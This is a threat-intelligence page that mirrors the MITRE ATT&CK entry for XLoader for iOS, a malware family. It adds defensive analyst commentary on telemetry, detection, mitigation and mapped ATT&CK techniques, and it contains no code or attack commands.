S0490: XLoader for iOS
XLoader for iOS is a malicious iOS application that is capable of gathering system information.[1] It is tracked separately from the XLoader for Android.
Analyst context for executives and security teams
XLoader for iOS matters because it represents malicious mobile software focused on discovering device and network details, with related behavior that includes modifying code-signing policy and exfiltrating data over a command-and-control channel. For leaders, the practical issue is not just one named malware family; it is whether managed iOS devices can be trusted to enforce app integrity, report suspicious profiles or signing changes, and provide enough telemetry for responders to understand what information may have been exposed.
Executive priority
Treat this as a mobile security and incident-readiness validation item for iOS environments. Key leadership questions are: are iOS devices enrolled and governed consistently, can the organization prove app/profile integrity controls are enforced, and can the SOC or IR team reconstruct device discovery and outbound communication activity if a malicious app is suspected? This is especially relevant where mobile devices access corporate identity, email, collaboration, or regulated data.
Technical view
ATT&CK lists XLoader for iOS as iOS malware capable of gathering system information and relates it to System Network Configuration Discovery, System Information Discovery, Code Signing Policy Modification, and Exfiltration Over C2 Channel. Because ATT&CK provides no official detection text for this object, defenders should validate coverage around the related techniques: collection of OS/hardware/network attributes, abnormal application or profile trust changes, and outbound communications that may carry data over the same channel used for command and control. Focus validation on iOS mobile device management, app inventory, configuration/profile state, and network egress visibility rather than assuming endpoint-style telemetry is available.
Likely telemetry
- Mobile device management enrollment, compliance, configuration, and profile state
- iOS application inventory and installation history
- Code-signing, developer trust, or profile-related change evidence where available
- Device OS version, hardware model, patch, and configuration attributes collected by management tools
- Network metadata for mobile device egress, including destination, timing, volume, and protocol where available
Detection direction
- Map current detections to the related ATT&CK techniques T1422, T1426, T1632.001, and T1646 rather than relying on the malware name alone.
- Validate whether iOS telemetry can reveal suspicious profile or code-signing policy changes; this is a common blind spot if devices are unmanaged or only lightly managed.
- Baseline expected mobile app inventory and network destinations so anomalous outbound communications from iOS devices can be reviewed with fewer false positives.
- Correlate mobile management data with network logs; either source alone may not prove discovery or exfiltration behavior.
- Account for legitimate system inventory collection by MDM tools when tuning detections for system and network information discovery.
Mitigation priorities
- Prioritize consistent iOS device enrollment and compliance enforcement for devices accessing business services.
- Maintain controls that restrict untrusted applications, profiles, and signing-policy changes where the environment supports them.
- Ensure mobile network traffic from managed devices is visible through approved VPN, proxy, DNS, or secure access paths where feasible.
- Define an IR playbook for suspected malicious mobile applications that includes device isolation, app/profile review, credential risk review, and evidence preservation.
- Use the ATT&CK relationships as control-test scenarios for mobile security, identity access reviews, and compliance evidence collection.
Analyst notes and limits
The official ATT&CK entry is sparse: it identifies XLoader for iOS as malicious iOS software capable of gathering system information and distinguishes it from XLoader for Android. The strongest defensive value comes from the provided relationships to discovery, code-signing policy modification, and exfiltration over C2 channel. The cited external reporting is Trend Micro’s 2019 analysis of XLoader/FakeSpy links.
ATT&CK provides no official detection guidance, no aliases, and no tactics for this object in the supplied fields. This take does not assert current activity, attribution, impact, or detection coverage. Local iOS management architecture, logging depth, and network routing determine what can actually be detected or proven during an incident.
XLoader for iOS
XLoader for iOS is a malicious iOS application that is capable of gathering system information.[1] It is tracked separately from the XLoader for Android.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Mobile | T1426 | System Information Discovery | XLoader for iOS can obtain the device’s UDID, version number, and product number.CitationTrendMicro-XLoader-FakeSpy |
| Mobile | T1422 | System Network Configuration Discovery | XLoader for iOS can obtain the device’s IMEM, ICCID, and MEID.CitationTrendMicro-XLoader-FakeSpy |
| Mobile | T1632.001 | Code Signing Policy Modification Sub-technique | XLoader for iOS has been installed via a malicious configuration profile.CitationTrendMicro-XLoader-FakeSpy |
| Mobile | T1646 | Exfiltration Over C2 Channel | XLoader for iOS has exfiltrated data using HTTP requests.CitationTrendMicro-XLoader-FakeSpy |
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.1 | Current bundle | dd18436cff33… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
TrendMicro-XLoader-FakeSpy
Hiroaki, H., Wu, L., Wu, L.. (2019, April 2). XLoader Disguises as Android Apps, Has FakeSpy Links. Retrieved July 20, 2020.
Open source URL -
[2]
mitre-attack S0490Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.